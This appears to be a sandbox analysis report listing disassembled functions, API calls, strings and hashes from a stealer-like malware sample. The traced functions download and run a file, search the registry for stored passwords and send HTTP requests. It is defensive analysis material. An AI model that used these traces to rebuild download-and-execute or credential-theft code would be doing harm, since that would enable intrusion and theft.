Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
Opcode Fuzzy Hash: 8853f5c5da968409b6cbaba164f86e7b859f398aed1122ab08fb9db45a23fc41
Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A

Function 004060A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
StrCmpCA.SHLWAPI(?,00750148), ref: 00406147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
InternetCloseHandle.WININET(a+A), ref: 00406253
InternetCloseHandle.WININET(00000000), ref: 00406260

Strings

a+A, xrefs: 004060B0, 0040617F, 00406266, 00406124, 004060B3
a+A, xrefs: 0040624F, 004061D8, 004061DB, 00406252

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: a+A$a+A
API String ID: 4287319946-2847607090
Opcode ID: 653881ee7fdcfb00626dfd15be3c7c07a9e0627dd95ec019f9b1fd5cab93ad4d
Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
Opcode Fuzzy Hash: 653881ee7fdcfb00626dfd15be3c7c07a9e0627dd95ec019f9b1fd5cab93ad4d
Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A

Function 022B0CC7 Relevance: 18.2, APIs: 12, Instructions: 205stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

memset.MSVCRT ref: 022B0E83
lstrcat.KERNEL32(?,00000000), ref: 022B0E9C
lstrcat.KERNEL32(?,00420D7C), ref: 022B0EAE
lstrcat.KERNEL32(?,00000000), ref: 022B0EC4
lstrcat.KERNEL32(?,00420D80), ref: 022B0ED6
lstrcat.KERNEL32(?,00000000), ref: 022B0EEF
lstrcat.KERNEL32(?,00420D84), ref: 022B0F01
lstrlen.KERNEL32(?), ref: 022B0F0E
memset.MSVCRT ref: 022B0F34
memset.MSVCRT ref: 022B0F48

Part of subcall function 022BAA87: lstrlen.KERNEL32(022A516C,?,?,022A516C,00420DDE), ref: 022BAA92
Part of subcall function 022BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022BAAEC

Part of subcall function 022B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022B8DED

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D

Part of subcall function 022B9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022B0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022B9948

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022B0FC1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 022B0FCD

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
String ID:
API String ID: 1395395982-0
Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
Instruction ID: 991cad3aab106bdd393eae8da1421a0758702f6bc8953681f0476e8fb6f278fc
Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
Instruction Fuzzy Hash: B981B4B5920318ABCB25EBE4DD51FED733AAF54344F004199E30A66085EF746B88CF69

Function 022B0CB6 Relevance: 18.2, APIs: 12, Instructions: 185stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

memset.MSVCRT ref: 022B0E83
lstrcat.KERNEL32(?,00000000), ref: 022B0E9C
lstrcat.KERNEL32(?,00420D7C), ref: 022B0EAE
lstrcat.KERNEL32(?,00000000), ref: 022B0EC4
lstrcat.KERNEL32(?,00420D80), ref: 022B0ED6
lstrcat.KERNEL32(?,00000000), ref: 022B0EEF
lstrcat.KERNEL32(?,00420D84), ref: 022B0F01
lstrlen.KERNEL32(?), ref: 022B0F0E
memset.MSVCRT ref: 022B0F34
memset.MSVCRT ref: 022B0F48

Part of subcall function 022BAA87: lstrlen.KERNEL32(022A516C,?,?,022A516C,00420DDE), ref: 022BAA92
Part of subcall function 022BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022BAAEC

Part of subcall function 022B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022B8DED

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D

Part of subcall function 022B9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022B0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022B9948

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022B0FC1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 022B0FCD

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
String ID:
API String ID: 1395395982-0
Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
Instruction ID: e70cf728bbfab4b996b050de2debee33486b9d0160da37489bd19e00d442d252
Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
Instruction Fuzzy Hash: 0B61D3B5520318ABCB25EBE0CD45FEE733AAF54344F004199E70A66085EF746B88CF69

Function 022A64E7 Relevance: 16.7, APIs: 11, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D

Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A51
Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A68
Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A7F
Part of subcall function 022A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022A4AA0
Part of subcall function 022A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022A4AB0

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022A6548
StrCmpCA.SHLWAPI(?,0064A480), ref: 022A656A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022A659C
HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022A65EC
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022A6626
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022A6638
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 022A6664
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022A66D4
InternetCloseHandle.WININET(00000000), ref: 022A6756
InternetCloseHandle.WININET(00000000), ref: 022A6760
InternetCloseHandle.WININET(00000000), ref: 022A676A

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID:
API String ID: 3074848878-0
Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
Instruction ID: a0fec0e057fa24388525de2d5ea9b19d24b07a040891c579075cddb2446f6c7c
Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
Instruction Fuzzy Hash: 7D718C75A60318ABDF24DFE4CC58BEEB779EF04700F104099E10AAB598DBB46A84CF51

Function 022B9277 Relevance: 16.7, APIs: 11, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 022B92D3

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
Instruction ID: 80a3808e8fc944be5c492c3b8a83e31c0133126080240e5db278e92b7942abba
Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
Instruction Fuzzy Hash: A771FAB9A50208ABDB14DFE4DD94FEEBBB9EF49300F108108F605A7294DB74A944CF61

Function 004170D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
memset.MSVCRT ref: 0041716A
??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
sA, xrefs: 00417111
sA, xrefs: 004172AE, 00417179, 0041717C

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-2614523144
Opcode ID: 6115dca80d6cf9bb482a94d79f66c36139396751b61d0524125d78405d7c6e46
Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
Opcode Fuzzy Hash: 6115dca80d6cf9bb482a94d79f66c36139396751b61d0524125d78405d7c6e46
Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D

Function 022B7767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 022B77A9
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 022B77E6
GetProcessHeap.KERNEL32(00000000,00000104), ref: 022B786A
RtlAllocateHeap.NTDLL(00000000), ref: 022B7871
wsprintfA.USER32 ref: 022B78A7

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Strings

B, xrefs: 022B78B4, 022B78BC, 022B7882, 022B788A
\, xrefs: 022B77C7
C, xrefs: 022B77B3
:, xrefs: 022B77C3

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\$B
API String ID: 1544550907-183544611
Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
Instruction ID: 82b7799760c15f37da967aabd8588d3655e2cc3e4fb044f393a69f173578be1a
Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
Instruction Fuzzy Hash: 33419EB1D10248EBDF11DFD4CC44BEEBBB9AF48700F000199E509A7284D7756A84CBA5

Function 004075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459

lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
task.LIBCPMTD ref: 004076FB

Strings

: , xrefs: 0040764E

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: d19bb9034be843adce2da22a5665dbbd0c26fc1f75395a982b8fbed49acf7942
Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
Opcode Fuzzy Hash: d19bb9034be843adce2da22a5665dbbd0c26fc1f75395a982b8fbed49acf7942
Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66

Function 004072D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407314
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459

Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B

task.LIBCPMTD ref: 00407555

Strings

Password, xrefs: 00407401

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5

Function 022B4317 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 022B433C
RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 022B435B
RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 022B437F
RegCloseKey.ADVAPI32(?), ref: 022B4389
lstrcat.KERNEL32(?,00000000), ref: 022B43AE
lstrcat.KERNEL32(?,0064A168), ref: 022B43C2

Strings

@&x, xrefs: 022B449A, 022B44A0
&x, xrefs: 022B43F2, 022B43F8

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID: @&x$&x
API String ID: 2623679115-4213947583
Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
Instruction ID: 5d1b69553ed5dd6e164586ad2261daa526d4601344fe90e874f49fb03f101ae5
Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
Instruction Fuzzy Hash: EF41C4B6950208BBDB15FBE0DC95FEE333EAB49300F004558A61957184EA756698CFE2

Function 004140B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004140D5
RegOpenKeyExA.ADVAPI32(80000001,00781F38,00000000,00020119,?), ref: 004140F4
RegQueryValueExA.ADVAPI32(?,007826D0,00000000,00000000,00000000,000000FF), ref: 00414118
RegCloseKey.ADVAPI32(?), ref: 00414122
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
lstrcatA.KERNEL32(?,00782700), ref: 0041415B

Strings

@&x, xrefs: 00414233
&x, xrefs: 0041418B

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID: @&x$&x
API String ID: 2623679115-4213947583
Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92

Function 00414780 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,00782718,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000), ref: 00414801
lstrcatA.KERNEL32(?,?), ref: 00414820
lstrcatA.KERNEL32(?,?), ref: 00414834
lstrcatA.KERNEL32(?,0074A3F0), ref: 00414847
lstrcatA.KERNEL32(?,?), ref: 0041485B
lstrcatA.KERNEL32(?,00781C58), ref: 0041486F

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F

Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD

Strings

0aA, xrefs: 004148F9, 004148A1, 004148A4

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID: 0aA
API String ID: 167551676-2786531170
Opcode ID: 385f363be4903eac86b7405a7b11766b7307db1bed5a32dad561bb07a2df71f9
Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
Opcode Fuzzy Hash: 385f363be4903eac86b7405a7b11766b7307db1bed5a32dad561bb07a2df71f9
Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99

Function 00418100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00781780,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00781780,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
__aulldiv.LIBCMT ref: 00418172
__aulldiv.LIBCMT ref: 00418180
wsprintfA.USER32 ref: 004181AC

Strings

%d MB, xrefs: 004181A3
@, xrefs: 0041814D

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
